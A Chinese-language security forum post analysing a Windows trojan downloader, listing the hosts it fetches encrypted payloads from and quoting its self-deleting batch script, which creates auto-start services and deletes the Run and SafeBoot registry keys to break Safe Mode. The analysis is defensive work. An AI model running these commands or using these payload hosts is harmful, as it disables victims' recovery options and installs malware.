pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
|
#2
病毒分析
该样本程序被执行后,等待外网联通,一旦处于联通状态,便从下列位置之一下载加密文件到%systemroot%下:
| Quote: | http ://122.224.9.151/kills.txt?t1=[RANDOM NUMBERS]
http ://lmok1234xing.w239.dns911.cn/kills.txt?t3=[RANDOM NUMBERS]
http ://122.224.9.151/kills.txt?t2=[RANDOM NUMBERS]
http ://baiduasp.web194.dns911.cn/kills.txt?4=[RANDOM NUMBERS]
http ://www.lmok123.com/kills.txt?t5==[RANDOM NUMBERS] |
|
其后缀为“txt”,名称为随机数,随后删除并在此目录下随机生成一个特定文件并隐藏运行之;此文件拷贝自身分别到目录%SystemRoot%\system32与%SystemRoot%下,名称均是随机生成,并在目录%AllUsersProfile%\「开始」菜单\程序\启动\下创建快捷方式,文件属性均为只读,隐藏,达到随机启动隐藏自身效果之一;还在目录%AllUsersProfile%\「开始」菜单\程序\启动\下生成一个随机名称的自删除批处理,达到创建开机服务实现另一个随机启动隐藏自身效果并修改相关注册表实现破坏安全模式,其主体内容如下:
| Quote: | sc.exe create 对应的随机服务名 BinPath= "C:\WINDOWS\随机名.exe AHNKZ6U" type= own type= interact start= auto DisplayName= 随机生成的显示服务名
sc.exe description对应的随机服务名描述服务的随机文字
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\
{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\
{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
{4D36E967-E325-11CE-BFC1-08002BE10318} /F
sc.exe create另外随机生成的服务名BinPath= "C:\WINDOWS\system32\另一个随机名.exe OOLE996TLS" type= own type= interact start= auto DisplayName= 7NCQO
sc.exe description 另外随机生成的服务名 描述服务的随机文字
del %0
del %0
exit |
|
并继续从上述的网站下载其它病毒木马,实现感染与接受黑客控制的目的。
| |
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
|
 |
|
